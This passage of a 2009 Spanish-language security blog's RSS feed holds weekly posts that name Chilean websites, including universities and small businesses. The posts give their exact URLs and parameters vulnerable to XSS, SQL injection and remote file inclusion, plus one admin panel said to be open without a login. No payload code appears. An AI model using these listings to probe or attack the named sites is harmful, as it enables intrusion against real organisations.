href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>5 sitios vulnerables de la semana</title>
		<link>http://blog.zerial.org/seguridad/5-sitios-vulnerables-de-la-semana/</link>
		<comments>http://blog.zerial.org/seguridad/5-sitios-vulnerables-de-la-semana/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 16:23:21 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=666</guid>
		<description><![CDATA[Para seguir con la tradición, acá están los 5 sitios vulnerables de la semana. Tres de ellos con vulnerabilidades XSS y uno con SQL Injection, el quinto tiene ambas. Generando un error mediante inyeccion de codigo mysql es posible explotar la vulnerabilidad XSS. Corresponden a las vulnerabildiades SQL Injection y XSS y los sitios son [...]]]></description>
			<content:encoded><![CDATA[<p>Para seguir con la tradición, acá están los 5 sitios vulnerables de la semana.<br />
Tres de ellos con vulnerabilidades XSS y uno con SQL Injection, el quinto tiene ambas. Generando un error mediante inyeccion de codigo mysql es posible explotar la vulnerabilidad XSS.</p>
<p><img class="alignright" style="margin: 4px;" title="kblocked" src="http://blog.zerial.org/wp-content/uploads/2009/07/kblocked.jpg" alt="kblocked" width="289" height="192" /></p>
<p>Corresponden a las vulnerabildiades SQL Injection y XSS y los sitios son los siguientes:</p>
<ul>
<li><a href="http://www.sirpachile.cl" target="_blank">sirpachile.cl</a></li>
<li><a href="http://www.tardis.cl" target="_blank">tardis.cl</a></li>
<li><a href="http://www.paihuen.cl" target="_blank">paihuen.cl</a></li>
<li><a href="http://www.paihuen.cl" target="_blank">dibam.cl</a></li>
<li><a href="http://www.balmacedartejoven.cl" target="_blank">balmacedartejoven.cl</a></li>
</ul>
<p><span id="more-666"></span></p>
<p>Las URL vulerables:</p>
<p><a href="http://www.sirapchile.cl/biblioteca.php?categoria_biblioteca=&amp;Submit=Buscar&amp;dat=" target="_blank">http://www.sirapchile.cl/biblioteca.php?categoria_biblioteca=&amp;Submit=Buscar&amp;dat=</a><strong>[XSS]</strong></p>
<p><a href="http://www.tardis.cl/uf.php?ano=" target="_blank">http://www.tardis.cl/uf.php?ano=</a><strong>[SQL Injection]</strong></p>
<p><a href="http://www.paihuen.cl/socios/default.asp?mensaje=" target="_blank">http://www.paihuen.cl/socios/default.asp?mensaje=</a><strong>[XSS]</strong></p>
<p><a href="http://www.dibam.cl/error.asp?cadena=a&amp;pagina=" target="_blank">http://www.dibam.cl/error.asp?cadena=a&amp;pagina=</a><strong>[XSS]</strong></p>
<p>La siguiente URI tiene dos vulnerabilidades:</p>
<p><a href=" http://www.balmacedartejoven.cl/portada_sede.php?go_sede=" target="_blank">http://www.balmacedartejoven.cl/portada_sede.php?go_sede=</a><strong>[SQL Injection | XSS ]</strong></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2F5-sitios-vulnerables-de-la-semana%2F&amp;linkname=5%20sitios%20vulnerables%20de%20la%20semana">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/5-sitios-vulnerables-de-la-semana/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Sitios vulnerables de la semana</title>
		<link>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-2/</link>
		<comments>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-2/#comments</comments>
		<pubDate>Sat, 18 Jul 2009 14:09:36 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[full path disclosure]]></category>
		<category><![CDATA[path disclosure]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=592</guid>
		<description><![CDATA[Los sitios vulnerables de esta semana correspnden a 5, lo inaceptable es que 3 de ellos pertenecen a la Universidad San Sebastián. Esta semana semana expondré sitios con vulnerabilidades de SQL Injection, XSS y Path Disclosure, los sitios afectados son: rmm.cl eduvic.cl cronica.cl uss.cl (www.uss.cl y enred.uss.cl) - Las vulnerabilidades XSS corresponden a los siguientes [...]]]></description>
			<content:encoded><![CDATA[<p>Los sitios vulnerables de esta semana correspnden a 5, lo inaceptable es que 3 de ellos pertenecen a la <a href="http://www.uss.cl" target="_blank">Universidad San Sebastián</a>. Esta semana semana expondré sitios con vulnerabilidades de SQL Injection, XSS y Path Disclosure, los sitios afectados son:<br />
<img class="alignright size-full wp-image-608" title="wrongway1" src="http://blog.zerial.org/wp-content/uploads/2009/07/wrongway1.jpg" alt="wrongway1" width="194" height="129" /></p>
<ul>
<li><a href="http://rmm.cl" target="_blank">rmm.cl</a></li>
<li><a href="http://eduvic.cl" target="_blank">eduvic.cl</a></li>
<li><a href="http://cronica.cl" target="_blank">cronica.cl</a></li>
<li><a href="http://uss.cl" target="_blank">uss.cl</a> (www.uss.cl y enred.uss.cl)</li>
</ul>
<p><span id="more-592"></span></p>
<p>- Las vulnerabilidades <em>XSS</em> corresponden a los siguientes sitios:</p>
<p><a href="http://www.rmm.cl/recursos.php?id_portal=335&amp;seccion=" target="_blank">http://www.rmm.cl/recursos.php?id_portal=335&amp;seccion=</a><strong>[XSS]</strong><br />
<a href="http://www.eduvic.cl/doc.asp?id=1&amp;nom=" target="_blank">http://www.eduvic.cl/doc.asp?id=1&amp;nom=</a><strong>[XSS]</strong><br />
<a href="http://enred.uss.cl/seccion/cambios_equipo_institucional.php?ac=" target="_blank">http://enred.uss.cl/seccion/cambios_equipo_institucional.php?ac=</a><strong>[XSS]</strong></p>
<p>- Los sitios con vulnerabilidad <em>SQL Injection</em> son:</p>
<p><a href="http://enred.uss.cl/seccion/cambios_equipo_institucional.php?ac=" target="_blank">http://enred.uss.cl/seccion/cambios_equipo_institucional.php?ac=</a><strong>[SQL Injection]</strong><br />
<a href="http://www.uss.cl/alumnos/noticias_detalle.php?s=20040708164902&amp;c=" target="_blank"> http://www.uss.cl/alumnos/noticias_detalle.php?s=20040708164902&amp;c=</a><strong>[SQL Injection]</strong></p>
<p>- <em>Full Path Disclosure</em></p>
<p><a href="http://www.cronica.cl/edicion_cronica/seccion/articulo.php?dia=1190088000&amp;seccion=" target="_blank">http://www.cronica.cl/edicion_cronica/seccion/articulo.php?dia=1190088000&amp;seccion=</a><strong>[XXX]</strong></p>
<p><strong>Bonus track<br />
</strong><br />
<a href="http://twittersheep.com/results.php?u=" target="_blank"> http://twittersheep.com/results.php?u=</a><strong>[XSS]</strong></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-2%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sitios vulnerables de la semana: 6</title>
		<link>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-6/</link>
		<comments>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-6/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 19:36:43 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[auth bypass]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=505</guid>
		<description><![CDATA[La semana pasada fue el turno de vulnerabildiades de tipo XSS, esta semana será una lista de sitios con vulnerabilidades RFI, XSS y SQL Injection. Los sitios o empresas afectados son: - Ecored.cl - iti.cl (https) - stiport.cl (https) - Lucylafuenteindo.cl - latitud90.com - Maqval.cl Con &#8220;Lucylafuenteindo.cl&#8221; intenté comunicarme para solucionar el problema pero luego [...]]]></description>
			<content:encoded><![CDATA[<p>La semana pasada fue el turno de vulnerabildiades de tipo XSS, esta semana será una lista de sitios con vulnerabilidades RFI, XSS y SQL Injection. Los sitios o empresas afectados son:<img class="alignright size-full wp-image-535" title="SQLInjection1" src="http://blog.zerial.org/wp-content/uploads/2009/07/SQLInjection1.jpg" alt="SQLInjection1" width="250" height="167" /></p>
<p>- <a href="http://ecored.cl" target="_blank">Ecored.cl</a><br />
- <a href="https://torpedo.iti.cl" target="_blank">iti.cl</a> (https)<br />
- <a href="https://www.stiport.cl" target="_blank">stiport.cl</a> (https)<br />
- <a href="http://lucylafuenteindo.cl" target="_blank">Lucylafuenteindo.cl</a><br />
- <a href="http://latitud90.com" target="_blank">latitud90.com</a><br />
- <a href="http://maqval.cl" target="_blank">Maqval.cl</a></p>
<p>Con &#8220;Lucylafuenteindo.cl&#8221; intenté comunicarme para solucionar el problema pero luego de corregir parcialmente el problema ni se contactaron conmigo. Ecored.cl parece ser (o fue) una empresa de informatica bastante vieja, nose si aun utillizaran el sitio. Con los otros sitios estoy intentando contactarme.<br />
Para leer mas detalladamente las fallas en cada uno de los sitios lea el articulo completo.</p>
<p><span id="more-505"></span>A continuación una lista de los sitios con su vulnerabilidad y su URI vulnerable</p>
<p><strong>Remote File Include</strong>:</p>
<p><a href="http://www.ecored.cl/php/a-mensaje-envia.php?foro=" target="_blank">http://www.ecored.cl/php/a-mensaje-envia.php?foro=</a><strong>[RFI]</strong><br />
<a href="https://torpedo.iti.cl/funciones/login.php?mensaje=" target="_blank"> https://torpedo.iti.cl/funciones/login.php?mensaje=</a><strong>[XSS]</strong>&amp;pagina=<strong>[RFI]</strong><br />
<a href="https://www.stiport.cl/funciones/login.php?mensaje=" target="_blank"> https://www.stiport.cl/funciones/login.php?mensaje=</a><strong>[XSS]</strong>&amp;pagina=<strong>[RFI]</strong></p>
<p><strong>XSS:<br />
</strong></p>
<p><a href="http://www.latitud90.com/admin/index.php?mensaje=" target="_blank">http://www.latitud90.com/admin/index.php?mensaje=</a><strong>[XSS]</strong>&amp;dia=<strong>[XSS]</strong>&amp;hora=<strong>[XSS]<br />
</strong><a href="http://www.maqval.cl/?ver=productos&amp;id=5&amp;cat=" target="_blank">http://www.maqval.cl/?ver=productos&amp;id=5&amp;cat=</a><strong>[XSS]</strong></p>
<p><strong>SQL Injection:</strong></p>
<p><a href="http://www.maqval.cl/?ver=carrito&amp;a=add&amp;c=1&amp;n=" target="_blank">http://www.maqval.cl/?ver=carrito&amp;a=add&amp;c=1&amp;n=</a><strong>[SQL]</strong></p>
<p>Y por ultimo, una vulnerabilidad bastante peculiar, se trata de <strong>Auth Bypass</strong>, podremos editar el contenido del sitio con tan solo conocer la ruta de la administración, sin un usuario ni un password. Personalmente, pienso que este tipo de <em>sistemas</em> es una <strong>falta de respeto</strong>.</p>
<p>Tenemos el sitio <a href="http://www.lucylafuenteindo.cl/" target="_blank">http://www.lucylafuenteindo.cl/</a> donde podemos navegar por su contenido, cuando ingresamos nos redirecciona a <a href="http://www.lucylafuenteindo.cl/web" target="_blank">http://www.lucylafuenteindo.cl/web</a> y misteriosamente, si nos vamos a <strong>/admin</strong>, podremos editar el contenido  como nosotros queramos, saltandonos cualquier tipo de autentificación que el sitio pudiese haber tenido:<br />
<a href="http://www.lucylafuenteindo.cl/web/admin/" target="_blank">http://www.lucylafuenteindo.cl/web/admin/</a></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-6%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana%3A%206">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-6/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidad XSS en Universidad de Concepción (UDEC)</title>
		<link>http://blog.zerial.org/seguridad/vulnerabilidad-xss-en-universidad-de-concepcion-udec/</link>
		<comments>http://blog.zerial.org/seguridad/vulnerabilidad-xss-en-universidad-de-concepcion-udec/#comments</comments>
		<pubDate>Wed, 08 Jul 2009 03:11:27 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[udec]]></category>
		<category><![CDATA[universidades]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=494</guid>
		<description><![CDATA[Al menos tres sitios de la Universidad de Concepción (UDEC) estában expuestos a un ataque XSS, luego de haber reportado el problema, los encargados se comunicaron rápidamente conmigo para solucionar el fallo. Las URI vulnerables eran las siguientes: - http://www.udec.cl - http://www.ing-mat.udec.cl De las cuales la primera tenía al menos dos scripts vulnerables - http://www.udec.cl/exalumnos/registro_google/mensaje.php?mensaje=[XSS] [...]]]></description>
			<content:encoded><![CDATA[<p>Al menos tres sitios de la <a href="http://www.udec.cl" target="_blank">Universidad de Concepción (UDEC)</a> estában expuestos a un ataque XSS, luego de haber reportado el problema, los encargados se comunicaron rápidamente conmigo para solucionar el fallo.<br />
Las URI vulnerables eran las siguientes:</p>
<p>- <a href="http://www.udec.cl" target="_blank">http://www.udec.cl</a><br />
- <a href="http://www.ing-mat.udec.cl" target="_blank">http://www.ing-mat.udec.cl</a></p>
<p>De las cuales la primera tenía al menos dos <em>scripts</em> vulnerables<br />
- <a href="http://www.udec.cl/exalumnos/registro_google/mensaje.php?mensaje=" target="_blank">http://www.udec.cl/exalumnos/registro_google/mensaje.php?mensaje=<strong>[XSS]</strong></a><br />
- <a href="http://www.udec.cl/egresados/mensaje.php?mensaje=" target="_blank">http://www.udec.cl/egresados/mensaje.php?mensaje=<strong>[XSS]</strong></a><br />
Y la segunda al menos una<br />
- <a href="http://www.ing-mat.udec.cl/biblioteca/buscar_libro_autor.php?autor=[XSS]" target="_blank">http://www.ing-mat.udec.cl/biblioteca/buscar_libro_autor.php?autor=<strong>[XSS]</strong></a><br />
Según los encargados</p>
<blockquote><p>Ya hemos desactivado el sitio  <a href="http://www.udec.cl/egresados">http://www.udec.cl/egresados</a> que estaba obsoleto.<br />
También notificamos a los desarrolladores de las otras direcciones para  que apliquen validaciones en los parámetros de los scripts a la  brevedad. En el último caso esperan cambiar pronto la plataforma por una  nueva.</p></blockquote>
<p>Hasta el momento sólo la segúnda (egresados) ha sido <em>fixeada</em>, las continuan vulnerables.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-xss-en-universidad-de-concepcion-udec%2F&amp;linkname=Vulnerabilidad%20XSS%20en%20Universidad%20de%20Concepci%C3%B3n%20%28UDEC%29">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/vulnerabilidad-xss-en-universidad-de-concepcion-udec/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
